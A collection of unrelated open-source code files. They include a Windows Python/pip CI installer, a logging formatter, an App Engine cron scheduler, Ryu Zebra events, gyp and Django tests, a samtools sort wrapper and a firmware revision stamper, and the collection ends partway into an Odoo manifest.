"3.4": [["msiexec.exe", "/L*+!", "install.log", "/qn", "/x", "{path}"],
["msiexec.exe", "/L*+!", "install.log", "/qn", "/i", "{path}", "TARGETDIR={home}"]],
"3.5": [["{path}", "/quiet", "TargetDir={home}"]],
}
def download_file(url, path):
print("Downloading: {} (into {})".format(url, path))
progress = [0, 0]
def report(count, size, total):
progress[0] = count * size
if progress[0] - progress[1] > 1000000:
progress[1] = progress[0]
print("Downloaded {:,}/{:,} ...".format(progress[1], total))
dest, _ = urlretrieve(url, path, reporthook=report)
return dest
def install_python(version, arch, home):
print("Installing Python", version, "for", arch, "bit architecture to", home)
if exists(home):
return
path = download_python(version, arch)
print("Installing", path, "to", home)
success = False
for cmd in INSTALL_CMD[version]:
cmd = [part.format(home=home, path=path) for part in cmd]
print("Running:", " ".join(cmd))
try:
check_call(cmd)
except Exception as exc:
print("Failed command", cmd, "with:", exc)
if exists("install.log"):
with open("install.log") as fh:
print(fh.read())
else:
success = True
if success:
print("Installation complete!")
else:
print("Installation failed")
def download_python(version, arch):
for _ in range(3):
try:
return download_file(URLS[version, arch], "installer.exe")
except Exception as exc:
print("Failed to download:", exc)
print("Retrying ...")
def install_pip(home):
pip_path = home + "/Scripts/pip.exe"
python_path = home + "/python.exe"
if exists(pip_path):
print("pip already installed.")
else:
print("Installing pip...")
download_file(GET_PIP_URL, GET_PIP_PATH)
print("Executing:", python_path, GET_PIP_PATH)
check_call([python_path, GET_PIP_PATH])
def install_packages(home, *packages):
cmd = [home + "/Scripts/pip.exe", "install"]
cmd.extend(packages)
check_call(cmd)
if __name__ == "__main__":
install_python(environ['PYTHON_VERSION'], environ['PYTHON_ARCH'], environ['PYTHON_HOME'])
install_pip(environ['PYTHON_HOME'])
install_packages(environ['PYTHON_HOME'], "setuptools>=18.0.1", "wheel", "tox", "virtualenv>=13.1.0")
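# --- Illustrative sketch (assumed CI configuration; values are hypothetical) -
# The entry point above reads three environment variables, which select the
# installer URL from URLS and the install command from INSTALL_CMD, e.g.:
#
#     PYTHON_VERSION=3.5  PYTHON_ARCH=64  PYTHON_HOME=C:\Python35-x64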
|
bsd-2-clause
|
jirikuncar/invenio-upgrader
|
invenio_upgrader/logging.py
|
20
|
2014
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2012, 2013, 2014 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
from __future__ import absolute_import
import logging
class InvenioUpgraderLogFormatter(logging.Formatter):
"""
Custom logging formatter allowing different log formats for different
error levels.
"""
def __init__(self, fmt, **overwrites):
self.fmt = fmt
self.overwrites = overwrites
self.prefix = ''
self.plugin_id = ''
logging.Formatter.__init__(self, fmt)
def get_level_fmt(self, level):
""" Get format for log level """
key = None
if level == logging.DEBUG:
key = 'debug'
elif level == logging.INFO:
key = 'info'
elif level == logging.WARNING:
key = 'warning'
elif level == logging.ERROR:
key = 'error'
elif level == logging.CRITICAL:
key = 'critical'
return self.overwrites.get(key, self.fmt)
def format(self, record):
""" Format log record """
format_orig = self._fmt
self._fmt = self.get_level_fmt(record.levelno)
record.prefix = self.prefix
record.plugin_id = self.plugin_id
result = logging.Formatter.format(self, record)
self._fmt = format_orig
return result
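# --- Illustrative sketch (assumed usage, not from the Invenio sources) -------
# Because format() swaps self._fmt per level, a handler can render warnings
# and errors differently from plain info messages, e.g.:
#
#     import logging
#     handler = logging.StreamHandler()
#     handler.setFormatter(InvenioUpgraderLogFormatter(
#         '%(prefix)s%(message)s',
#         warning='%(prefix)sWARNING: %(message)s',
#         error='%(prefix)sERROR: %(message)s',
#     ))
#     logger = logging.getLogger('upgrader_demo')   # hypothetical logger name
#     logger.addHandler(handler)
#     logger.warning('recipe is deprecated')   # -> "WARNING: recipe is deprecated"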
|
gpl-2.0
|
edwardzhou1980/bite-project
|
deps/gdata-python-client/samples/oauth/oauth_on_appengine/appengine_utilities/cron.py
|
129
|
18386
|
"""
Copyright (c) 2008, appengine-utilities project
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
- Neither the name of the appengine-utilities project nor the names of its
contributors may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import os
import cgi
import re
import datetime
import pickle
from google.appengine.ext import db
from google.appengine.api import urlfetch
from google.appengine.api import memcache
APPLICATION_PORT = '8080'
CRON_PORT = '8081'
class _AppEngineUtilities_Cron(db.Model):
"""
Model for the tasks in the datastore. This contains the scheduling and
url information, as well as a field that sets the next time the instance
should run.
"""
cron_entry = db.StringProperty()
next_run = db.DateTimeProperty()
cron_compiled = db.BlobProperty()
url = db.LinkProperty()
class Cron(object):
"""
Cron is a scheduling utility built for appengine, modeled after
crontab for unix systems. While true scheduled tasks are not
    possible within the Appengine environment currently, this
    is an attempt to provide a request-based alternative. You
    configure the tasks in an included interface, and then import
    the class on any request you want capable of running tasks.
    On each request where Cron is imported, the list of tasks
    that need to be run will be pulled and run. A task is a url
    within your application. It's important to make sure that these
    requests run quickly, or you could risk timing out the actual
request.
See the documentation for more information on configuring
your application to support Cron and setting up tasks.
"""
def __init__(self):
# Check if any tasks need to be run
query = _AppEngineUtilities_Cron.all()
query.filter('next_run <= ', datetime.datetime.now())
results = query.fetch(1000)
if len(results) > 0:
one_second = datetime.timedelta(seconds = 1)
before = datetime.datetime.now()
for r in results:
if re.search(':' + APPLICATION_PORT, r.url):
r.url = re.sub(':' + APPLICATION_PORT, ':' + CRON_PORT, r.url)
#result = urlfetch.fetch(r.url)
diff = datetime.datetime.now() - before
if int(diff.seconds) < 1:
if memcache.add(str(r.key), "running"):
result = urlfetch.fetch(r.url)
r.next_run = self._get_next_run(pickle.loads(r.cron_compiled))
r.put()
memcache.delete(str(r.key))
else:
break
def add_cron(self, cron_string):
cron = cron_string.split(" ")
        if len(cron) != 6:
raise ValueError, 'Invalid cron string. Format: * * * * * url'
cron = {
'min': cron[0],
'hour': cron[1],
'day': cron[2],
'mon': cron[3],
'dow': cron[4],
'url': cron[5],
}
cron_compiled = self._validate_cron(cron)
next_run = self._get_next_run(cron_compiled)
cron_entry = _AppEngineUtilities_Cron()
cron_entry.cron_entry = cron_string
cron_entry.next_run = next_run
cron_entry.cron_compiled = pickle.dumps(cron_compiled)
cron_entry.url = cron["url"]
cron_entry.put()
def _validate_cron(self, cron):
"""
Parse the field to determine whether it is an integer or lists,
also converting strings to integers where necessary. If passed bad
values, raises a ValueError.
"""
parsers = {
'dow': self._validate_dow,
'mon': self._validate_mon,
'day': self._validate_day,
'hour': self._validate_hour,
'min': self._validate_min,
            'url': self._validate_url,
}
for el in cron:
parse = parsers[el]
cron[el] = parse(cron[el])
return cron
def _validate_type(self, v, t):
"""
Validates that the number (v) passed is in the correct range for the
type (t). Raise ValueError, if validation fails.
Valid ranges:
day of week = 0-7
month = 1-12
day = 1-31
hour = 0-23
minute = 0-59
        All can be * which will then return the range for that entire type.
"""
if t == "dow":
if v >= 0 and v <= 7:
return [v]
elif v == "*":
return "*"
else:
raise ValueError, "Invalid day of week."
elif t == "mon":
if v >= 1 and v <= 12:
return [v]
elif v == "*":
                return range(1, 13)
else:
raise ValueError, "Invalid month."
elif t == "day":
if v >= 1 and v <= 31:
return [v]
elif v == "*":
                return range(1, 32)
else:
raise ValueError, "Invalid day."
elif t == "hour":
if v >= 0 and v <= 23:
return [v]
elif v == "*":
                return range(0, 24)
else:
raise ValueError, "Invalid hour."
elif t == "min":
if v >= 0 and v <= 59:
return [v]
elif v == "*":
                return range(0, 60)
else:
raise ValueError, "Invalid minute."
def _validate_list(self, l, t):
"""
        Validates a crontab list. Lists are numerical values separated
        by a comma with no spaces. Ex: 0,5,10,15
        Arguments:
            l: comma separated list of numbers
t: type used for validation, valid values are
dow, mon, day, hour, min
"""
elements = l.split(",")
return_list = []
# we have a list, validate all of them
for e in elements:
if "-" in e:
return_list.extend(self._validate_range(e, t))
else:
try:
v = int(e)
self._validate_type(v, t)
return_list.append(v)
except:
raise ValueError, "Names are not allowed in lists."
# return a list of integers
return return_list
def _validate_range(self, r, t):
"""
        Validates a crontab range. Ranges are 2 numerical values separated
        by a dash with no spaces. Ex: 0-10
        Arguments:
            r: dash separated list of 2 numbers
t: type used for validation, valid values are
dow, mon, day, hour, min
"""
elements = r.split('-')
# a range should be 2 elements
        if len(elements) != 2:
raise ValueError, "Invalid range passed: " + str(r)
# validate the minimum and maximum are valid for the type
for e in elements:
self._validate_type(int(e), t)
# return a list of the numbers in the range.
# +1 makes sure the end point is included in the return value
return range(int(elements[0]), int(elements[1]) + 1)
def _validate_step(self, s, t):
"""
Validates a crontab step. Steps are complicated. They can
be based on a range 1-10/2 or just step through all valid
*/2. When parsing times you should always check for step first
and see if it has a range or not, before checking for ranges because
        this will handle steps of ranges returning the final list. Steps
        of lists are not supported.
Arguments:
            s: slash separated string
t: type used for validation, valid values are
dow, mon, day, hour, min
"""
elements = s.split('/')
# a range should be 2 elements
        if len(elements) != 2:
raise ValueError, "Invalid step passed: " + str(s)
try:
step = int(elements[1])
except:
raise ValueError, "Invalid step provided " + str(s)
r_list = []
# if the first element is *, use all valid numbers
        if elements[0] == "*" or elements[0] == "":
r_list.extend(self._validate_type('*', t))
# check and see if there is a list of ranges
elif "," in elements[0]:
ranges = elements[0].split(",")
for r in ranges:
# if it's a range, we need to manage that
if "-" in r:
r_list.extend(self._validate_range(r, t))
else:
try:
                        r_list.append(int(r))
except:
raise ValueError, "Invalid step provided " + str(s)
elif "-" in elements[0]:
r_list.extend(self._validate_range(elements[0], t))
return range(r_list[0], r_list[-1] + 1, step)
def _validate_dow(self, dow):
"""
"""
# if dow is * return it. This is for date parsing where * does not mean
# every day for crontab entries.
        if dow == "*":
return dow
days = {
'mon': 1,
'tue': 2,
'wed': 3,
'thu': 4,
'fri': 5,
'sat': 6,
# per man crontab sunday can be 0 or 7.
'sun': [0, 7],
}
        if dow in days:
            dow = days[dow]
            # 'sun' maps to a list ([0, 7]); don't wrap it in another list.
            if isinstance(dow, list):
                return dow
            return [dow]
# if dow is * return it. This is for date parsing where * does not mean
# every day for crontab entries.
        elif dow == "*":
return dow
elif "/" in dow:
return(self._validate_step(dow, "dow"))
elif "," in dow:
return(self._validate_list(dow, "dow"))
elif "-" in dow:
return(self._validate_range(dow, "dow"))
else:
valid_numbers = range(0, 8)
if not int(dow) in valid_numbers:
raise ValueError, "Invalid day of week " + str(dow)
else:
return [int(dow)]
def _validate_mon(self, mon):
months = {
'jan': 1,
'feb': 2,
'mar': 3,
'apr': 4,
'may': 5,
'jun': 6,
'jul': 7,
'aug': 8,
'sep': 9,
'oct': 10,
'nov': 11,
'dec': 12,
}
if mon in months:
mon = months[mon]
return [mon]
        elif mon == "*":
return range(1, 13)
elif "/" in mon:
return(self._validate_step(mon, "mon"))
elif "," in mon:
return(self._validate_list(mon, "mon"))
elif "-" in mon:
return(self._validate_range(mon, "mon"))
else:
valid_numbers = range(1, 13)
if not int(mon) in valid_numbers:
raise ValueError, "Invalid month " + str(mon)
else:
return [int(mon)]
def _validate_day(self, day):
        if day == "*":
return range(1, 32)
elif "/" in day:
return(self._validate_step(day, "day"))
elif "," in day:
return(self._validate_list(day, "day"))
elif "-" in day:
return(self._validate_range(day, "day"))
else:
            valid_numbers = range(1, 32)
if not int(day) in valid_numbers:
raise ValueError, "Invalid day " + str(day)
else:
return [int(day)]
def _validate_hour(self, hour):
        if hour == "*":
return range(0, 24)
elif "/" in hour:
return(self._validate_step(hour, "hour"))
elif "," in hour:
return(self._validate_list(hour, "hour"))
elif "-" in hour:
return(self._validate_range(hour, "hour"))
else:
            valid_numbers = range(0, 24)
if not int(hour) in valid_numbers:
raise ValueError, "Invalid hour " + str(hour)
else:
return [int(hour)]
def _validate_min(self, min):
        if min == "*":
return range(0, 60)
elif "/" in min:
return(self._validate_step(min, "min"))
elif "," in min:
return(self._validate_list(min, "min"))
elif "-" in min:
return(self._validate_range(min, "min"))
else:
            valid_numbers = range(0, 60)
if not int(min) in valid_numbers:
raise ValueError, "Invalid min " + str(min)
else:
return [int(min)]
def _validate_url(self, url):
# kludge for issue 842, right now we use request headers
# to set the host.
        if url[0] != "/":
url = "/" + url
url = 'http://' + str(os.environ['HTTP_HOST']) + url
return url
# content below is for when that issue gets fixed
#regex = re.compile("^(http|https):\/\/([a-z0-9-]\.+)*", re.IGNORECASE)
#if regex.match(url) is not None:
# return url
#else:
# raise ValueError, "Invalid url " + url
def _calc_month(self, next_run, cron):
while True:
if cron["mon"][-1] < next_run.month:
next_run = next_run.replace(year=next_run.year+1, \
month=cron["mon"][0], \
day=1,hour=0,minute=0)
else:
if next_run.month in cron["mon"]:
return next_run
else:
                    # datetime.timedelta has no 'months' argument, so step a
                    # day at a time until a matching month is reached.
                    next_run = (next_run + datetime.timedelta(days=1)).replace(
                        hour=0, minute=0)
def _calc_day(self, next_run, cron):
# start with dow as per cron if dow and day are set
# then dow is used if it comes before day. If dow
# is *, then ignore it.
if str(cron["dow"]) != str("*"):
# convert any integers to lists in order to easily compare values
m = next_run.month
while True:
                if next_run.month != m:
next_run = next_run.replace(hour=0, minute=0)
next_run = self._calc_month(next_run, cron)
if next_run.weekday() in cron["dow"] or next_run.day in cron["day"]:
return next_run
else:
one_day = datetime.timedelta(days=1)
next_run = next_run + one_day
else:
m = next_run.month
while True:
                if next_run.month != m:
next_run = next_run.replace(hour=0, minute=0)
next_run = self._calc_month(next_run, cron)
# if cron["dow"] is next_run.weekday() or cron["day"] is next_run.day:
if next_run.day in cron["day"]:
return next_run
else:
one_day = datetime.timedelta(days=1)
next_run = next_run + one_day
def _calc_hour(self, next_run, cron):
m = next_run.month
d = next_run.day
while True:
            if next_run.month != m:
                next_run = next_run.replace(hour=0, minute=0)
                next_run = self._calc_month(next_run, cron)
            if next_run.day != d:
                next_run = next_run.replace(hour=0)
                next_run = self._calc_day(next_run, cron)
if next_run.hour in cron["hour"]:
return next_run
else:
m = next_run.month
d = next_run.day
one_hour = datetime.timedelta(hours=1)
next_run = next_run + one_hour
def _calc_minute(self, next_run, cron):
one_minute = datetime.timedelta(minutes=1)
m = next_run.month
d = next_run.day
h = next_run.hour
while True:
            if next_run.month != m:
                next_run = next_run.replace(minute=0)
                next_run = self._calc_month(next_run, cron)
            if next_run.day != d:
                next_run = next_run.replace(minute=0)
                next_run = self._calc_day(next_run, cron)
            if next_run.hour != h:
                next_run = next_run.replace(minute=0)
                next_run = self._calc_day(next_run, cron)
if next_run.minute in cron["min"]:
return next_run
else:
m = next_run.month
d = next_run.day
h = next_run.hour
next_run = next_run + one_minute
def _get_next_run(self, cron):
one_minute = datetime.timedelta(minutes=1)
# go up 1 minute because it shouldn't happen right when added
now = datetime.datetime.now() + one_minute
next_run = now.replace(second=0, microsecond=0)
# start with month, which will also help calculate year
next_run = self._calc_month(next_run, cron)
next_run = self._calc_day(next_run, cron)
next_run = self._calc_hour(next_run, cron)
next_run = self._calc_minute(next_run, cron)
return next_run
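# --- Illustrative sketch (assumed usage, not part of the original module) ---
# add_cron() expects six space-separated fields: min hour day mon dow url.
# For example, scheduling a task URL for minute 0 of every hour might look
# like this inside any request handler (the URL is hypothetical):
#
#     cron = Cron()                             # also runs any tasks now due
#     cron.add_cron("0 * * * * /tasks/cleanup")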
|
apache-2.0
|
fujita/ryu
|
ryu/services/protocols/zebra/event.py
|
4
|
3530
|
# Copyright (C) 2017 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Events for Zebra protocol service.
"""
import inspect
import logging
from ryu import utils
from ryu.controller import event
from ryu.lib.packet import zebra
LOG = logging.getLogger(__name__)
MOD = utils.import_module(__name__)
ZEBRA_EVENTS = []
class EventZebraBase(event.EventBase):
"""
The base class for Zebra protocol service event class.
The subclasses have at least ``zclient`` and the same attributes with
:py:class: `ryu.lib.packet.zebra.ZebraMessage`.
``zclient`` is an instance of Zebra client class. See
:py:class: `ryu.services.protocols.zebra.client.zclient.ZClient` or
:py:class: `ryu.services.protocols.zebra.server.zserver.ZClient`.
The subclasses are named as::
``"Event" + <Zebra message body class name>``
    For example, if the service received a ZEBRA_INTERFACE_ADD message,
the body class should be
:py:class: `ryu.lib.packet.zebra.ZebraInterfaceAdd`, then the event
class will be named as::
"Event" + "ZebraInterfaceAdd" = "EventZebraInterfaceAdd"
``msg`` argument must be an instance of
:py:class: `ryu.lib.packet.zebra.ZebraMessage` and used to extract the
attributes for the event classes.
"""
def __init__(self, zclient, msg):
super(EventZebraBase, self).__init__()
assert isinstance(msg, zebra.ZebraMessage)
self.__dict__ = msg.__dict__
self.zclient = zclient
def __repr__(self):
m = ', '.join(
['%s=%r' % (k, v)
for k, v in self.__dict__.items() if not k.startswith('_')])
return "%s(%s)" % (self.__class__.__name__, m)
__str__ = __repr__
def _event_name(body_cls):
return 'Event%s' % body_cls.__name__
def message_to_event(zclient, msg):
"""
Converts Zebra protocol message instance to Zebra protocol service
event instance.
If corresponding event class is not defined, returns None.
:param zclient: Zebra client instance.
:param msg: Zebra protocol message.
:return: Zebra protocol service event.
"""
if not isinstance(msg, zebra.ZebraMessage):
return None
body_cls = msg.get_body_class(msg.version, msg.command)
ev_cls = getattr(MOD, _event_name(body_cls), None)
if ev_cls is None:
return None
return ev_cls(zclient, msg)
def _define_event_class(body_cls):
name = _event_name(body_cls)
event_cls = type(name, (EventZebraBase,), {})
globals()[name] = event_cls
return event_cls
def _generate_event_classes():
for zebra_cls in zebra.__dict__.values():
if (not inspect.isclass(zebra_cls)
or not issubclass(zebra_cls, zebra._ZebraMessageBody)
or zebra_cls.__name__.startswith('_')):
continue
ev = _define_event_class(zebra_cls)
# LOG.debug('Generated Zebra event: %s' % ev)
ZEBRA_EVENTS.append(ev)
_generate_event_classes()
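# --- Illustrative sketch (derived from the naming convention above) ----------
# A received message body class maps directly to a generated event class:
#
#     from ryu.lib.packet import zebra
#     _event_name(zebra.ZebraInterfaceAdd)    # -> 'EventZebraInterfaceAdd'
#
# and message_to_event(zclient, msg) returns an instance of that class, or
# None when no event class exists for the message body.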
|
apache-2.0
|
bulldy80/gyp_unofficial
|
test/msvs/external_builder/gyptest-all.py
|
260
|
1878
|
#!/usr/bin/env python
# Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that msvs_external_builder being set will invoke the provided
msvs_external_builder_build_cmd and msvs_external_builder_clean_cmd, and will
not invoke MSBuild actions and rules.
"""
import os
import sys
import TestGyp
if int(os.environ.get('GYP_MSVS_VERSION', 0)) < 2010:
sys.exit(0)
test = TestGyp.TestGyp(formats=['msvs'], workdir='workarea_all')
# without the flag set
test.run_gyp('external.gyp')
test.build('external.gyp', target='external')
test.must_not_exist('external_builder.out')
test.must_exist('msbuild_rule.out')
test.must_exist('msbuild_action.out')
test.must_match('msbuild_rule.out', 'msbuild_rule.py hello.z a b c')
test.must_match('msbuild_action.out', 'msbuild_action.py x y z')
os.remove('msbuild_rule.out')
os.remove('msbuild_action.out')
# with the flag set, using Build
try:
os.environ['GYP_DEFINES'] = 'use_external_builder=1'
test.run_gyp('external.gyp')
test.build('external.gyp', target='external')
finally:
del os.environ['GYP_DEFINES']
test.must_not_exist('msbuild_rule.out')
test.must_not_exist('msbuild_action.out')
test.must_exist('external_builder.out')
test.must_match('external_builder.out', 'external_builder.py build 1 2 3')
os.remove('external_builder.out')
# with the flag set, using Clean
try:
os.environ['GYP_DEFINES'] = 'use_external_builder=1'
test.run_gyp('external.gyp')
test.build('external.gyp', target='external', clean=True)
finally:
del os.environ['GYP_DEFINES']
test.must_not_exist('msbuild_rule.out')
test.must_not_exist('msbuild_action.out')
test.must_exist('external_builder.out')
test.must_match('external_builder.out', 'external_builder.py clean 4 5')
os.remove('external_builder.out')
test.pass_test()
|
bsd-3-clause
|
qfma/ohnolog-dc
|
ase-estimation/parallel-bamsort-location.py
|
1
|
1424
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# parallel-bamsort-location.py
#==============================================================================
import argparse
import sys
import os
# Make utilities folder available
sys.path.append(os.path.abspath("../"))
from utilities.runner import exec_commands
from utilities.io import list_files
#==============================================================================
#Command line options==========================================================
#==============================================================================
parser = argparse.ArgumentParser()
parser.add_argument("indir", type=str,
help="A directory containing input BAM files")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
#==============================================================================
def get_bam_files(files):
bam_files = []
for f in files:
file_name, file_extension = os.path.splitext(f)
if file_extension == ".bam":
bam_files.append(f)
return bam_files
def main():
files = list_files(args.indir)
bam_files = get_bam_files(files)
commands = []
for bam in bam_files:
outfile = bam.split(".")[0]+".loc.sorted"
commands.append(["samtools", "sort", bam, outfile])
exec_commands(commands)
if __name__ == "__main__":
main()
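# --- Illustrative sketch (hypothetical file names) ---------------------------
# For an input directory containing sample1.bam and sample2.bam, the commands
# run in parallel by exec_commands() would be:
#
#     samtools sort sample1.bam sample1.loc.sorted
#     samtools sort sample2.bam sample2.loc.sorted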
|
mit
|
michelts/lettuce
|
tests/integration/lib/Django-1.3/tests/regressiontests/inline_formsets/tests.py
|
51
|
6157
|
from django.forms.models import inlineformset_factory
from django.test import TestCase
from regressiontests.inline_formsets.models import Poet, Poem, School, Parent, Child
class DeletionTests(TestCase):
def test_deletion(self):
PoemFormSet = inlineformset_factory(Poet, Poem, can_delete=True)
poet = Poet.objects.create(name='test')
poem = poet.poem_set.create(name='test poem')
data = {
'poem_set-TOTAL_FORMS': u'1',
'poem_set-INITIAL_FORMS': u'1',
'poem_set-MAX_NUM_FORMS': u'0',
'poem_set-0-id': str(poem.pk),
'poem_set-0-poet': str(poet.pk),
'poem_set-0-name': u'test',
'poem_set-0-DELETE': u'on',
}
formset = PoemFormSet(data, instance=poet)
formset.save()
self.assertTrue(formset.is_valid())
self.assertEqual(Poem.objects.count(), 0)
def test_add_form_deletion_when_invalid(self):
"""
Make sure that an add form that is filled out, but marked for deletion
doesn't cause validation errors.
"""
PoemFormSet = inlineformset_factory(Poet, Poem, can_delete=True)
poet = Poet.objects.create(name='test')
data = {
'poem_set-TOTAL_FORMS': u'1',
'poem_set-INITIAL_FORMS': u'0',
'poem_set-MAX_NUM_FORMS': u'0',
'poem_set-0-id': u'',
'poem_set-0-poem': u'1',
'poem_set-0-name': u'x' * 1000,
}
formset = PoemFormSet(data, instance=poet)
# Make sure this form doesn't pass validation.
self.assertEqual(formset.is_valid(), False)
self.assertEqual(Poem.objects.count(), 0)
# Then make sure that it *does* pass validation and delete the object,
# even though the data isn't actually valid.
data['poem_set-0-DELETE'] = 'on'
formset = PoemFormSet(data, instance=poet)
self.assertEqual(formset.is_valid(), True)
formset.save()
self.assertEqual(Poem.objects.count(), 0)
def test_change_form_deletion_when_invalid(self):
"""
Make sure that a change form that is filled out, but marked for deletion
doesn't cause validation errors.
"""
PoemFormSet = inlineformset_factory(Poet, Poem, can_delete=True)
poet = Poet.objects.create(name='test')
poem = poet.poem_set.create(name='test poem')
data = {
'poem_set-TOTAL_FORMS': u'1',
'poem_set-INITIAL_FORMS': u'1',
'poem_set-MAX_NUM_FORMS': u'0',
'poem_set-0-id': unicode(poem.id),
'poem_set-0-poem': unicode(poem.id),
'poem_set-0-name': u'x' * 1000,
}
formset = PoemFormSet(data, instance=poet)
# Make sure this form doesn't pass validation.
self.assertEqual(formset.is_valid(), False)
self.assertEqual(Poem.objects.count(), 1)
# Then make sure that it *does* pass validation and delete the object,
# even though the data isn't actually valid.
data['poem_set-0-DELETE'] = 'on'
formset = PoemFormSet(data, instance=poet)
self.assertEqual(formset.is_valid(), True)
formset.save()
self.assertEqual(Poem.objects.count(), 0)
def test_save_new(self):
"""
Make sure inlineformsets respect commit=False
regression for #10750
"""
# exclude some required field from the forms
ChildFormSet = inlineformset_factory(School, Child, exclude=['father', 'mother'])
school = School.objects.create(name=u'test')
mother = Parent.objects.create(name=u'mother')
father = Parent.objects.create(name=u'father')
data = {
'child_set-TOTAL_FORMS': u'1',
'child_set-INITIAL_FORMS': u'0',
'child_set-MAX_NUM_FORMS': u'0',
'child_set-0-name': u'child',
}
formset = ChildFormSet(data, instance=school)
self.assertEqual(formset.is_valid(), True)
objects = formset.save(commit=False)
for obj in objects:
obj.mother = mother
obj.father = father
obj.save()
self.assertEqual(school.child_set.count(), 1)
class InlineFormsetFactoryTest(TestCase):
def test_inline_formset_factory(self):
"""
These should both work without a problem.
"""
inlineformset_factory(Parent, Child, fk_name='mother')
inlineformset_factory(Parent, Child, fk_name='father')
def test_exception_on_unspecified_foreign_key(self):
"""
Child has two ForeignKeys to Parent, so if we don't specify which one
to use for the inline formset, we should get an exception.
"""
self.assertRaisesRegexp(Exception,
"<class 'regressiontests.inline_formsets.models.Child'> has more than 1 ForeignKey to <class 'regressiontests.inline_formsets.models.Parent'>",
inlineformset_factory, Parent, Child
)
def test_fk_name_not_foreign_key_field_from_child(self):
"""
If we specify fk_name, but it isn't a ForeignKey from the child model
to the parent model, we should get an exception.
"""
self.assertRaises(Exception,
"fk_name 'school' is not a ForeignKey to <class 'regressiontests.inline_formsets.models.Parent'>",
inlineformset_factory, Parent, Child, fk_name='school'
)
def test_non_foreign_key_field(self):
"""
If the field specified in fk_name is not a ForeignKey, we should get an
exception.
"""
self.assertRaisesRegexp(Exception,
"<class 'regressiontests.inline_formsets.models.Child'> has no field named 'test'",
inlineformset_factory, Parent, Child, fk_name='test'
)
def test_any_iterable_allowed_as_argument_to_exclude(self):
# Regression test for #9171.
inlineformset_factory(
Parent, Child, exclude=['school'], fk_name='mother'
)
inlineformset_factory(
Parent, Child, exclude=('school',), fk_name='mother'
)
|
gpl-3.0
|
aaronsp777/radishdisplay
|
display/firmware/stamp_revision.py
|
1
|
1652
|
#!/usr/bin/python2.4
#
# Copyright 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Extracts a revision string from stdin, and writes a header to stdout.
The generated header file defines two macro constants so that the compilied
code can be better optimized. These bytes are sent over the wire to identify
the firmware revision. The IDLOC macro programs the ID location in the pic,
which can be read by programmers and debuggers.
"""
import sre
import struct
import sys
# Example: "// $Revision: #5 $"
pattern = sre.compile(".*\\$Revision:\\s*#(\\d+)\\s*\\$")
revision = -1
for line in sys.stdin:
match = pattern.match(line)
if match:
# Add one, because that's the revision it'll be when committed
revision = int(match.group(1)) + 1
revision_string = struct.pack("<h", revision)
output = """
#ifndef HARDWARE_SIGNAGE_DISPLAY_REVISION_H__
#define HARDWARE_SIGNAGE_DISPLAY_REVISION_H__
#include <pic.h>
#define REVISION_LOW %d
#define REVISION_HIGH %d
__IDLOC(%04X);
#endif // HARDWARE_SIGNAGE_DISPLAY_REVISION_H__
""" % (ord(revision_string[0]), ord(revision_string[1]), revision)
sys.stdout.write(output)
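# --- Illustrative sketch ------------------------------------------------------
# Feeding a line such as "// $Revision: #5 $" on stdin yields revision 6 (the
# script adds one), so the generated header contains REVISION_LOW 6,
# REVISION_HIGH 0 and __IDLOC(0006);.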
|
apache-2.0
|
odoomrp/odoomrp-wip
|
purchase_landed_cost/__openerp__.py
|
8
|
1451
|
# -*- coding: utf-8 -*-
# Copyright 2013 Joaquín Gutierrez
# Copyright 2014-2017 Pedro M. Baeza <[email protected]>
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3
{
'name': 'Purchase landed costs - Alternative option',
'version': '8.0.2.5.0',
"author": "OdooMRP team,"
